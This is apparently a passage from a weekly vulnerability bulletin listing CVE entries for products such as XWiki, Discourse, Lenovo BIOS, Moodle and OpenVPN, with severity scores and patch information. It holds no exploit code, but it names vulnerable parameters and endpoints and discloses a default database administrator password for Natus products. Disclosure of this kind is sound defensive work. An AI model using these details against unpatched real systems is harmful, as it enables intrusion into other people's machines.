wpn-xm — wpn-xm A Cross-Site Scripting vulnerability has been detected in WPN-XM Serverstack affecting version 0.8.6. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload through the /tools/webinterface/index.php parameter and retrieve the cookie session details of an authenticated user, resulting in a session hijacking. 2023-11-03 6.1 CVE-2023-4592
MISC
xwiki — xwiki XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. XWiki is vulnerable to reflected cross-site scripting (RXSS) via the `rev` parameter that is used in the content of the content menu without escaping. If an attacker can convince a user to visit a link with a crafted parameter, this allows the attacker to execute arbitrary actions in the name of the user, including remote code (Groovy) execution in the case of a user with programming right, compromising the confidentiality, integrity and availability of the whole XWiki installation. This has been patched in XWiki 15.6 RC1, 15.5.1 and 14.10.14. The patch in commit `04e325d57` can be manually applied without upgrading (or restarting) the instance. Users are advised to upgrade or to manually apply the patch. There are no known workarounds for this vulnerability. 2023-11-06 6.1 CVE-2023-46732
MISC
MISC
MISC
xwiki — xwiki XWiki Platform is a generic wiki platform. In org.xwiki.platform:xwiki-platform-livetable-ui starting with version 3.5-milestone-1 and prior to versions 14.10.9 and 15.3-rc-1, the mail obfuscation configuration was not fully taken into account and is was still possible by obfuscated emails. This has been patched in XWiki 14.10.9 and XWiki 15.3-rc-1. A workaround is to modify the page `XWiki.LiveTableResultsMacros` following the patch. 2023-11-07 4.3 CVE-2023-38509

 

yugabyte — yugabytedb YugabyteDB is vulnerable to cross site scripting (XSS) via log injection. Writing invalidated user input to log files can allow an unprivileged attacker to forge log entries or inject malicious content into the logs. 2023-11-08 6.1 CVE-2023-6002
zohocorp — manageengine_desktop_central A CRLF injection vulnerability has been found in ManageEngine Desktop Central affecting version 9.1.0. This vulnerability could allow a remote attacker to inject arbitrary HTTP headers and perform HTTP response splitting attacks via the fileName parameter in /STATE_ID/1613157927228/InvSWMetering.csv. 2023-11-03 6.1 CVE-2023-4767
MISC
zohocorp — manageengine_desktop_central A CRLF injection vulnerability has been found in ManageEngine Desktop Central affecting version 9.1.0. This vulnerability could allow a remote attacker to inject arbitrary HTTP headers and perform HTTP response splitting attacks via the fileName parameter in /STATE_ID/1613157927228/InvSWMetering.pdf. 2023-11-03 6.1 CVE-2023-4768
MISC
zscaler — client_connector Origin Validation Error vulnerability in Zscaler Client Connector on Linux allows Privilege Abuse. This issue affects Zscaler Client Connector for Linux: before 1.3.1.6. 2023-11-06 6.5 CVE-2023-28794
MISC

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
nokia — g-040w-q_firmware Chunghwa Telecom NOKIA G-040W-Q Firewall function does not block ICMP TIMESTAMP requests by default, an unauthenticated remote attacker can exploit this vulnerability by sending a crafted package, resulting in partially sensitive information exposed to an actor. 2023-11-03 3.3 CVE-2023-41354
MISC
opensc — opensc An out-of-bounds read vulnerability was found in OpenSC packages within the MyEID driver when handling symmetric key encryption. Exploiting this flaw requires an attacker to have physical access to the computer and a specially crafted USB device or smart card. This flaw allows the attacker to manipulate APDU responses and potentially gain unauthorized access to sensitive data, compromising the system’s security. 2023-11-06 3.8 CVE-2023-4535
MISC
MISC
MISC
MISC
MISC
MISC
samsung — firewall Implicit intent hijacking vulnerability in Firewall application prior to versions 12.1.00.24 in Android 11, 13.1.00.16 in Android 12 and 14.1.00.7 in Android 13 allows 3rd party application to tamper the database of Firewall. 2023-11-07 3.3 CVE-2023-42552
samsung — push_service Improper access control vulnerability in Samsung Push Service prior to 3.4.10 allows local attackers to get register ID to identify the device. 2023-11-07 3.3 CVE-2023-42542

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
apache — pyarrow Deserialization of untrusted data in IPC and Parquet readers in PyArrow versions 0.14.0 to 14.0.0 allows arbitrary code execution. An application is vulnerable if it reads Arrow IPC, Feather or Parquet data from untrusted sources (for example user-supplied input files). This vulnerability only affects PyArrow, no other Apache Arrow implementations or bindings. It is recommended that users of PyArrow upgrade to 14.0.1. Similarly, it is recommended that downstream libraries upgrade their dependency requirements to PyArrow 14.0.1 or later. PyPI packages are already available, and we hope that conda-forge packages will be available soon. If it is not possible to upgrade, we provide a separate package `pyarrow-hotfix` that disables the vulnerability on older PyArrow versions. See https://pypi.org/project/pyarrow-hotfix/ for instructions. 2023-11-09 not yet calculated CVE-2023-47248

 

apache — uima_java_sdk_core
 
Deserialization of Untrusted Data, Improper Input Validation vulnerability in Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK.This issue affects Apache UIMA Java SDK: before 3.5.0. Users are recommended to upgrade to version 3.5.0, which fixes the issue. There are several locations in the code where serialized Java objects are deserialized without verifying the data. This affects in particular: * the deserialization of a Java-serialized CAS, but also other binary CAS formats that include TSI information using the CasIOUtils class; * the CAS Editor Eclipse plugin which uses the the CasIOUtils class to load data; * the deserialization of a Java-serialized CAS of the Vinci Analysis Engine service which can receive using Java-serialized CAS objects over network connections; * the CasAnnotationViewerApplet and the CasTreeViewerApplet; * the checkpointing feature of the CPE module. Note that the UIMA framework by default does not start any remotely accessible services (i.e. Vinci) that would be vulnerable to this issue. A user or developer would need to make an active choice to start such a service. However, users or developers may use the CasIOUtils in their own applications and services to parse serialized CAS data. They are affected by this issue unless they ensure that the data passed to CasIOUtils is not a serialized Java object. When using Vinci or using CasIOUtils in own services/applications, the unrestricted deserialization of Java-serialized CAS files may allow arbitrary (remote) code execution. As a remedy, it is possible to set up a global or context-specific ObjectInputFilter (cf. https://openjdk.org/jeps/290  and  https://openjdk.org/jeps/415 ) if running UIMA on a Java version that supports it. Note that Java 1.8 does not support the ObjectInputFilter, so there is no remedy when running on this out-of-support platform. An upgrade to a recent Java version is strongly recommended if you need to secure an UIMA version that is affected by this issue. To mitigate the issue on a Java 9+ platform, you can configure a filter pattern through the “jdk.serialFilter” system property using a semicolon as a separator: To allow deserializing Java-serialized binary CASes, add the classes: * org.apache.uima.cas.impl.CASCompleteSerializer * org.apache.uima.cas.impl.CASMgrSerializer * org.apache.uima.cas.impl.CASSerializer * java.lang.String To allow deserializing CPE Checkpoint data, add the following classes (and any custom classes your application uses to store its checkpoints): * org.apache.uima.collection.impl.cpm.CheckpointData * org.apache.uima.util.ProcessTrace * org.apache.uima.util.impl.ProcessTrace_impl * org.apache.uima.collection.base_cpm.SynchPoint Make sure to use “!*” as the final component to the filter pattern to disallow deserialization of any classes not listed in the pattern. Apache UIMA 3.5.0 uses tightly scoped ObjectInputFilters when reading Java-serialized data depending on the type of data being expected. Configuring a global filter is not necessary with this version. 2023-11-08 not yet calculated CVE-2023-39913
 
apereo_foundation — apereo_cas
 
Improper Authentication vulnerability in Apereo CAS in jakarta.servlet.http.HttpServletRequest.getRemoteAddr method allows Multi-Factor Authentication bypass. This issue affects CAS: through 7.0.0-RC7. It is unknown whether in new versions the issue will be fixed. For the date of publication there is no patch, and the vendor does not treat it as a vulnerability. 2023-11-09 not yet calculated CVE-2023-4612
 
appsanywhere — appsanywhere The AppsAnywhere macOS client-privileged helper can be tricked into executing arbitrary commands with elevated permissions by a local user process. 2023-11-09 not yet calculated CVE-2023-41138
appsanywhere — appsanywhere
 
Symmetric encryption used to protect messages between the AppsAnywhere server and client can be broken by reverse engineering the client and used to impersonate the AppsAnywhere server. 2023-11-09 not yet calculated CVE-2023-41137
avast/avg — avast/avg_antivirus A time-of-check to time-of-use (TOCTOU) bug in handling of IOCTL (input/output control) requests. This TOCTOU bug leads to an out-of-bounds write vulnerability which can be further exploited, allowing an attacker to gain full local privilege escalation on the system. This issue affects Avast/Avg Antivirus: 23.8. 2023-11-08 not yet calculated CVE-2023-5760
axios — axios
 
An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information. 2023-11-08 not yet calculated CVE-2023-45857
bigbluebutton — bigbluebutton When duplicating a BigBlueButton activity, the original meeting ID was also duplicated instead of using a new ID for the new activity. This could provide unintended access to the original meeting. 2023-11-09 not yet calculated CVE-2023-5543

 

bigbluebutton — bigbluebutton
 
PILOS is an open source front-end for BigBlueButton servers with a built-in load balancer. The password reset component deployed within PILOS uses the hostname supplied within the request host header when building a password reset URL. It may be possible to manipulate the URL sent to PILOS users so that it points to the attacker’s server, thereby disclosing the password reset token if/when the link is followed. This only affects local user accounts and requires the password reset option to be enabled. This issue has been patched in version 2.3.0. 2023-11-08 not yet calculated CVE-2023-47107
beijing_baichuo — smart_s85f_firmware A vulnerability, which was classified as problematic, was found in Beijing Baichuo Smart S85F Management Platform V31R02B10-01. Affected is an unknown function of the file /login.php. The manipulation of the argument txt_newpwd leads to weak password recovery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-244992. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-11 not yet calculated CVE-2023-5959

 

chromedriver — chromedriver
 
Versions of the package chromedriver before 119.0.1 are vulnerable to Command Injection when setting the chromedriver.path to an arbitrary system binary. This could lead to unauthorized access and potentially malicious actions on the host system. Note: An attacker must have access to the system running the vulnerable chromedriver library to exploit it. The success of exploitation also depends on the permissions and privileges of the process running chromedriver. 2023-11-09 not yet calculated CVE-2023-26156

 

combodo — itop Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page. 2023-11-09 not yet calculated CVE-2023-47488
combodo — itop An issue in Combodo iTop v.3.1.0-2-11973 allows a local attacker to execute arbitrary code via a crafted script to the export-v2.php and ajax.render.php components. 2023-11-09 not yet calculated CVE-2023-47489
couchbase_inc. — couchbase_server
 
An issue was discovered in Couchbase Server 7.2.0. There is a private key leak in debug.log while adding a pre-7.0 node to a 7.2 cluster. 2023-11-08 not yet calculated CVE-2023-45875

 

discourse — discourse Discourse is an open source platform for community discussion. In versions 3.1.0 through 3.1.2 of the `stable` branch and versions 3.1.0,beta6 through 3.2.0.beta2 of the `beta` and `tests-passed` branches, Redis memory can be depleted by crafting a site with an abnormally long favicon URL and drafting multiple posts which Onebox it. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. There are no known workarounds. 2023-11-10 not yet calculated CVE-2023-47120

 

discourse — discourse Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, the embedding feature is susceptible to server-side request forgery. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. As a workaround, disable the Embedding feature. 2023-11-10 not yet calculated CVE-2023-47121

 

discourse — discourse
 
Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, if a user has been quoted and uses a `|` in their full name, they might be able to trigger a bug that generates a lot of duplicate content in all the posts they’ve been quoted by updating their full name again. Version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches contain a patch for this issue. No known workaround exists, although one can stop the “bleeding” by ensuring users only use alphanumeric characters in their full name field. 2023-11-10 not yet calculated CVE-2023-45806

 

discourse — discourse
 
Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, there is an edge case where a bookmark reminder is sent and an unread notification is generated, but the underlying bookmarkable (e.g. post, topic, chat message) security has changed, making it so the user can no longer access the underlying resource. As of version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, bookmark reminders are now no longer sent if the user does not have access to the underlying bookmarkable, and also the unread bookmark notifications are always filtered by access. There are no known workarounds. 2023-11-10 not yet calculated CVE-2023-45816

 

discourse — discourse
 
Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, some theme components allow users to add svgs with unlimited `height` attributes, and this can affect the availability of subsequent replies in a topic. Most Discourse instances are unaffected, only instances with the svgbob or the mermaid theme component are within scope. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. As a workaround, disable or remove the relevant theme components. 2023-11-10 not yet calculated CVE-2023-46130

 

discourse — discourse
 
Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, some links can inject arbitrary HTML tags when rendered through our Onebox engine. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. There are no known workarounds. 2023-11-10 not yet calculated CVE-2023-47119

 

eclipse_foundation — eclipse_ide
 
In Eclipse IDE versions < 2023-09 (4.29) some files with xml content are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch). 2023-11-09 not yet calculated CVE-2023-4218

 

ethyca — fides Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in your runtime environment, and the enforcement of privacy regulations in your code. The Fides web application allows data subject users to request access to their personal data. If the request is approved by the data controller user operating the Fides web application, the data subject’s personal data can then be retrieved from connected systems and data stores before being bundled together as a data subject access request package for the data subject to download. Supported data formats for the package include json and csv, but the most commonly used format is a series of HTML files compressed in a ZIP file. Once downloaded and unzipped, the data subject user can browse the HTML files on their local machine. It was identified that there was no validation of input coming from e.g. the connected systems and data stores which is later reflected in the downloaded data. This can result in an HTML injection that can be abused e.g. for phishing attacks or malicious JavaScript code execution, but only in the context of the data subject’s browser accessing a HTML page using the `file://` protocol. Exploitation is limited to rogue Admin UI users, malicious connected system / data store users, and the data subject user if tricked via social engineering into submitting malicious data themselves. This vulnerability has been patched in version 2.23.3. 2023-11-08 not yet calculated CVE-2023-47114

 

free_software_foundation — grub-legacy An attacker with local access to a system (either through a disk or external drive) can present a modified XFS partition to grub-legacy in such a way to exploit a memory corruption in grub’s XFS file system implementation. 2023-11-10 not yet calculated CVE-2023-4949
freebsd — freebsd In versions of FreeBSD 12.4-RELEASE prior to 12.4-RELEASE-p7 and FreeBSD 13.2-RELEASE prior to 13.2-RELEASE-p5 the __sflush() stdio function in libc does not correctly update FILE objects’ write space members for write-buffered streams when the write(2) system call returns an error.  Depending on the nature of an application that calls libc’s stdio functions and the presence of errors returned from the write(2) system call (or an overridden stdio write routine) a heap buffer overflow may occur. Such overflows may lead to data corruption or the execution of arbitrary code at the privilege level of the calling program. 2023-11-08 not yet calculated CVE-2023-5941
freebsd — freebsd In versions of FreeBSD 13-RELEASE before 13-RELEASE-p5, under certain circumstances the cap_net libcasper(3) service incorrectly validates that updated constraints are strictly subsets of the active constraints.  When only a list of resolvable domain names was specified without setting any other limitations, an application could submit a new list of domains including include entries not previously listed.  This could permit the application to resolve domain names that were previously restricted. 2023-11-08 not yet calculated CVE-2023-5978
gitlab — gitlab
 
An issue has been discovered in GitLab EE affecting all versions starting from 15.3 prior to 16.2.8, 16.3 prior to 16.3.5, and 16.4 prior to 16.4.1. Code owner approval was not removed from merge requests when the target branch was updated. 2023-11-09 not yet calculated CVE-2023-4379
gitsign — gitsign Gitsign is software for keyless Git signing using Sigstore. In versions of gitsign starting with 0.6.0 and prior to 0.8.0, Rekor public keys were fetched via the Rekor API, instead of through the local TUF client. If the upstream Rekor server happened to be compromised, gitsign clients could potentially be tricked into trusting incorrect signatures. There is no known compromise the default public good instance (`rekor.sigstore.dev`) – anyone using this instance is unaffected. This issue was fixed in v0.8.0. No known workarounds are available. 2023-11-10 not yet calculated CVE-2023-47122

 

go_standard_library — path/filepath
 
The filepath package does not recognize paths with a ?? prefix as special. On Windows, a path beginning with ?? is a Root Local Device path equivalent to a path beginning with \?. Paths with a ?? prefix may be used to access arbitrary locations on the system. For example, the path ??c:x is equivalent to the more common path c:x. Before fix, Clean could convert a rooted path such as a..??b into the root local device path ??b. Clean will now convert this to .??b. Similarly, Join(, ??, b) could convert a seemingly innocent sequence of path elements into the root local device path ??b. Join will now convert this to .??b. In addition, with fix, IsAbs now correctly reports paths beginning with ?? as absolute, and VolumeName correctly reports the ?? prefix as a volume name. 2023-11-09 not yet calculated CVE-2023-45283

 

go_standard_library — path/filepath
 
On Windows, The IsLocal function does not correctly detect reserved device names in some cases. Reserved names followed by spaces, such as “COM1 “, and reserved names “COM” and “LPT” followed by superscript 1, 2, or 3, are incorrectly reported as local. With fix, IsLocal now correctly reports these names as non-local. 2023-11-09 not yet calculated CVE-2023-45284

 

gpac — mp4box
 
Buffer Overflow vulnerability in gpac MP4Box v.2.3-DEV-rev573-g201320819-master allows a local attacker to cause a denial of service via the gpac/src/isomedia/isom_read.c:2807:51 function in gf_isom_get_user_data. 2023-11-07 not yet calculated CVE-2023-46001
 
harbor — harbor
 
A timing condition in Harbor 2.6.x and below, Harbor 2.7.2 and below, Harbor 2.8.2 and below, and Harbor 1.10.17 and below allows an attacker with network access to create jobs/stop job tasks and retrieve job task information. 2023-11-09 not yet calculated CVE-2023-20902
hashicorp — vault HashiCorp Vault and Vault Enterprise inbound client requests triggering a policy check can lead to an unbounded consumption of memory. A large number of these requests may lead to denial-of-service. Fixed in Vault 1.15.2, 1.14.6, and 1.13.10. 2023-11-09 not yet calculated CVE-2023-5954
hcl_software — hcl_connections
 
HCL Connections is vulnerable to reflected cross-site scripting (XSS) where an attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user after visiting the vulnerable URL which contains the malicious script code. This may allow the attacker to steal cookie-based authentication credentials and comprise a user’s account then launch other attacks. 2023-11-09 not yet calculated CVE-2023-37533
headscale — headscale Headscale through 0.22.3 writes bearer tokens to info-level logs. 2023-11-11 not yet calculated CVE-2023-47390
hoteldruid — hoteldruid Cross-site scripting vulnerability in HOTELDRUID 3.0.5 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product. 2023-11-10 not yet calculated CVE-2023-47164

 

huawei — emui
 
Vulnerability of parameters being out of the value range in the QMI service module. Successful exploitation of this vulnerability may cause errors in reading file data. 2023-11-08 not yet calculated CVE-2023-46772
 
humansignal — label_studio
 
Label Studio is a multi-type data labeling and annotation tool with standardized output format. There is a vulnerability that can be chained within the ORM Leak vulnerability to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user. The vulnerability was found to affect versions before `1.8.2`, where a patch was introduced. 2023-11-09 not yet calculated CVE-2023-43791

 

ibm — aix
 
IBM AIX’s 7.3 Python implementation could allow a non-privileged local user to exploit a vulnerability to cause a denial of service. IBM X-Force ID: 267965. 2023-11-10 not yet calculated CVE-2023-45167

 

ibm — qradar_siem
 
IBM QRadar SIEM 7.5.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 267484. 2023-11-11 not yet calculated CVE-2023-43057
 
jaspersoft — clarity_ppm
 
Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function. 2023-11-09 not yet calculated CVE-2023-37790
johnson_controls — quantum_hd_unity An unauthorized user could access debug features in Quantum HD Unity products that were accidentally exposed. 2023-11-10 not yet calculated CVE-2023-4804
 
lanaccess — onsafe_monitorhm An improper input validation vulnerability has been found in Lanaccess ONSAFE MonitorHM affecting version 3.7.0. This vulnerability could lead a remote attacker to exploit the checkbox element and perform remote code execution, compromising the entire infrastructure. 2023-11-08 not yet calculated CVE-2023-6012
lenovo — 1_preload_directory
 
A privilege escalation vulnerability was reported in Lenovo preloaded devices deployed using Microsoft AutoPilot under a standard user account due to incorrect default privileges. 2023-11-08 not yet calculated CVE-2023-4706
lenovo — bios
 
A memory leakage vulnerability was reported in the SWSMI_Shadow DXE driver that may allow a local attacker with elevated privileges to write to NVRAM variables. 2023-11-08 not yet calculated CVE-2023-45075
lenovo — bios
 
A memory leakage vulnerability was reported in the 534D0140 DXE driver that may allow a local attacker with elevated privileges to write to NVRAM variables. 2023-11-08 not yet calculated CVE-2023-45076
lenovo — bios
 
A memory leakage vulnerability was reported in the 534D0740 DXE driver that may allow a local attacker with elevated privileges to write to NVRAM variables. 2023-11-08 not yet calculated CVE-2023-45077
lenovo — bios
 
A memory leakage vulnerability was reported in the DustFilterAlertSmm SMM driver that may allow a local attacker with elevated privileges to write to NVRAM variables. 2023-11-08 not yet calculated CVE-2023-45078
lenovo — bios
 
A memory leakage vulnerability was reported in the NvmramSmm SMM driver that may allow a local attacker with elevated privileges to write to NVRAM variables. 2023-11-08 not yet calculated CVE-2023-45079
lenovo — desktop_bios
 
A buffer overflow was reported in the LemSecureBootForceKey module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 not yet calculated CVE-2023-43567
lenovo — desktop_bios
 
A buffer over-read was reported in the LemSecureBootForceKey module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to disclose sensitive information. 2023-11-08 not yet calculated CVE-2023-43568
lenovo — desktop_bios
 
A buffer overflow was reported in the OemSmi module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.  2023-11-08 not yet calculated CVE-2023-43569
lenovo — desktop_bios
 
A potential vulnerability was reported in the SMI callback function of the OemSmi driver that may allow a local attacker with elevated permissions to execute arbitrary code. 2023-11-08 not yet calculated CVE-2023-43570
lenovo — ideapad A buffer overflow was reported in the FmpSipoCapsuleDriver driver in the IdeaPad Duet 3-10IGL5 that may allow a local attacker with elevated privileges to execute arbitrary code. 2023-11-08 not yet calculated CVE-2023-5075
lenovo — lecloud_app Lenovo LeCloud App improper input validation allows attackers to access arbitrary components and arbitrary file downloads, which could result in information disclosure. 2023-11-08 not yet calculated CVE-2023-5079
lenovo — system_update
 
An uncontrolled search path vulnerability was reported in Lenovo System Update that could allow an attacker with local access to execute code with elevated privileges. 2023-11-08 not yet calculated CVE-2023-4632
lenovo — thinkpad A vulnerability was reported in some ThinkPad BIOS that could allow a physical or local attacker with elevated privileges to tamper with BIOS firmware. 2023-11-08 not yet calculated CVE-2023-5078
lenovo — view_driver A potential use-after-free vulnerability was reported in the Lenovo View driver that could result in denial of service. 2023-11-08 not yet calculated CVE-2023-4891
f.b.p — members_line The leakage of channel access token in F.B.P members Line 13.6.1 allows remote attackers to send malicious notifications to victims. 2023-11-09 not yet calculated CVE-2023-47363
f.b.p — members_line The leakage of channel access token in nagaoka taxi Line 13.6.1 allows remote attackers to send malicious notifications to victims 2023-11-09 not yet calculated CVE-2023-47364
f.b.p — members_line The leakage of channel access token in Lil.OFF-PRICE STORE Line 13.6.1 allows remote attackers to send malicious notifications to victims. 2023-11-09 not yet calculated CVE-2023-47365
f.b.p — members_line The leakage of channel access token in craft_members Line 13.6.1 allows remote attackers to send malicious notifications to victims. 2023-11-09 not yet calculated CVE-2023-47366
f.b.p — members_line The leakage of channel access token in platinum clinic Line 13.6.1 allows remote attackers to send malicious notifications to victims. 2023-11-09 not yet calculated CVE-2023-47367
f.b.p — members_line The leakage of channel access token in taketorinoyu Line 13.6.1 allows remote attackers to send malicious notifications to victims. 2023-11-09 not yet calculated CVE-2023-47368
f.b.p — members_line The leakage of channel access token in best_training_member Line 13.6.1 allows remote attackers to send malicious notifications. 2023-11-09 not yet calculated CVE-2023-47369
f.b.p — members_line The leakage of channel access token in bluetrick Line 13.6.1 allows remote attackers to send malicious notifications to victims. 2023-11-09 not yet calculated CVE-2023-47370
f.b.p — members_line The leakage of channel access token in UPDATESALON C-LOUNGE Line 13.6.1 allows remote attackers to send malicious notifications to victims. 2023-11-09 not yet calculated CVE-2023-47372
f.b.p — members_line The leakage of channel access token in DRAGON FAMILY Line 13.6.1 allows remote attackers to send malicious notifications to victims. 2023-11-09 not yet calculated CVE-2023-47373
linux — kernel A use-after-free flaw was found in lan78xx_disconnect in drivers/net/usb/lan78xx.c in the network sub-component, net/usb/lan78xx in the Linux Kernel. This flaw allows a local attacker to crash the system when the LAN78XX USB device detaches. 2023-11-09 not yet calculated CVE-2023-6039

 

linux — kernel
 
A race condition was found in the QXL driver in the Linux kernel. The qxl_mode_dumb_create() function dereferences the qobj returned by the qxl_gem_object_create_with_handle(), but the handle is the only one holding a reference to it. This flaw allows an attacker to guess the returned handle value and trigger a use-after-free issue, potentially leading to a denial of service or privilege escalation. 2023-11-09 not yet calculated CVE-2023-39198
 
loytec_electronics — multiple_products
 
LOYTEC LINX-212 firmware 6.2.4 and LVIS-3ME12-A1 firmware 6.2.2 and LIOB-586 firmware 6.2.3 devices send password-change requests via cleartext HTTP. 2023-11-04 not yet calculated CVE-2023-46380
MISC
loytec_electronics — multiple_products
 
LOYTEC LINX-212 firmware 6.2.4 and LVIS-3ME12-A1 firmware 6.2.2 and LIOB-586 firmware 6.2.3 devices lack authentication for the preinstalled version of LWEB-802 via an lweb802_pre/ URI. An unauthenticated attacker can edit any project (or create a new project) and control its GUI. 2023-11-04 not yet calculated CVE-2023-46381
MISC
loytec_electronics — multiple_products
 
LOYTEC LINX-212 firmware 6.2.4 and LVIS-3ME12-A1 firmware 6.2.2 and LIOB-586 firmware 6.2.3 devices use cleartext HTTP for login. 2023-11-04 not yet calculated CVE-2023-46382
MISC
microsoft — edge_chromium
 
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability 2023-11-10 not yet calculated CVE-2023-36027
mldb.ai — mldb.ai
 
Cross Site Scripting vulnerability in MLDB.ai v.2017.04.17.0 allows a remote attacker to execute arbitrary code via a crafted payload to the public_html/doc/index.html. 2023-11-09 not yet calculated CVE-2023-46492
moodle — moodle A remote code execution risk was identified in the Lesson activity. By default, this was only available to teachers and managers. 2023-11-09 not yet calculated CVE-2023-5539

 

moodle — moodle A remote code execution risk was identified in the IMSCP activity. By default, this was only available to teachers and managers. 2023-11-09 not yet calculated CVE-2023-5540

 

moodle — moodle Students in “Only see own membership” groups could see other students in the group, which should be hidden. 2023-11-09 not yet calculated CVE-2023-5542

 

moodle — moodle H5P metadata automatically populated the author with the user’s username, which could be sensitive information. 2023-11-09 not yet calculated CVE-2023-5545

 

moodle — moodle Stronger revision number limitations were required on file serving endpoints to improve cache poisoning protection. 2023-11-09 not yet calculated CVE-2023-5548

 

moodle — moodle Insufficient web service capability checks made it possible to move categories a user had permission to manage, to a parent category they did not have the capability to manage. 2023-11-09 not yet calculated CVE-2023-5549

 

moodle — moodle In a shared hosting environment that has been misconfigured to allow access to other users’ content, a Moodle user who also has direct access to the web server outside of the Moodle webroot could utilize a local file include to achieve remote code execution. 2023-11-09 not yet calculated CVE-2023-5550

 

moodle — moodle Separate Groups mode restrictions were not honored in the forum summary report, which would display users from other groups. 2023-11-09 not yet calculated CVE-2023-5551

 

natus — multiple_products Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services. 2023-11-10 not yet calculated CVE-2023-47800
 
okta — ldap_agent
 
The LDAP Agent Update service with versions prior to 5.18 used an unquoted path, which could allow arbitrary code execution. 2023-11-08 not yet calculated CVE-2023-0392
opentelemetry — opentelemetry OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go. Prior to version 0.46.0, the grpc Unary Server Interceptor out of the box adds labels `net.peer.sock.addr` and `net.peer.sock.port` that have unbound cardinality. It leads to the server’s potential memory exhaustion when many malicious requests are sent. An attacker can easily flood the peer address and port for requests. Version 0.46.0 contains a fix for this issue. As a workaround to stop being affected, a view removing the attributes can be used. The other possibility is to disable grpc metrics instrumentation by passing `otelgrpc.WithMeterProvider` option with `noop.NewMeterProvider`. 2023-11-10 not yet calculated CVE-2023-47108

 

opentext — fortify_scancentral_dast Incorrect Privilege Assignment vulnerability in opentext Fortify ScanCentral DAST. The vulnerability could be exploited to gain elevated privileges. This issue affects Fortify ScanCentral DAST versions 21.1, 21.2, 21.2.1, 22.1, 22.1.1, 22.2, 23.1. 2023-11-08 not yet calculated CVE-2023-5913
openvpn — openvpn
 
Using the –fragment option in certain configuration setups OpenVPN version 2.6.0 to 2.6.6 allows an attacker to trigger a divide by zero behaviour which could cause an application crash, leading to a denial of service. 2023-11-11 not yet calculated CVE-2023-46849

 

openvpn — openvpn
 
Use after free in OpenVPN version 2.6.0 to 2.6.6 may lead to undefined behavoir, leaking memory buffers or remote execution when sending network buffers to a remote peer. 2023-11-11 not yet calculated CVE-2023-46850

 

ovh — the_bastion
 
The Bastion provides authentication, authorization, traceability and auditability for SSH accesses. SCP and SFTP plugins don’t honor group-based JIT MFA. Establishing a SCP/SFTP connection through The Bastion via a group access where MFA is enforced does not ask for additional factor. This abnormal behavior only applies to per-group-based JIT MFA. Other MFA setup types, such as Immediate MFA, JIT MFA on a per-plugin basis and JIT MFA on a per-account basis are not affected. This issue has been patched in version 3.14.15. 2023-11-08 not yet calculated CVE-2023-45140
 
palo_alto_networks — cortex_xsoar
 
A local privilege escalation (PE) vulnerability in the Palo Alto Networks Cortex XSOAR engine software running on a Linux operating system enables a local attacker to execute programs with elevated privileges if the attacker has shell access to the engine. 2023-11-08 not yet calculated CVE-2023-3282
pfsense_ce — pfsense_ce
 
An issue discovered in Pfsense CE version 2.6.0 allows attackers to compromise user accounts via weak password requirements. 2023-11-08 not yet calculated CVE-2023-29974
pfsense_ce — pfsense_ce
 
An issue discovered in Pfsense CE version 2.6.0 allows attackers to change the password of any user without verification. 2023-11-09 not yet calculated CVE-2023-29975
philips — encoreanywhere
 
The HTTP header in Philips EncoreAnywhere contains data an attacker may be able to use to gain sensitive information. 2023-11-09 not yet calculated CVE-2018-8863
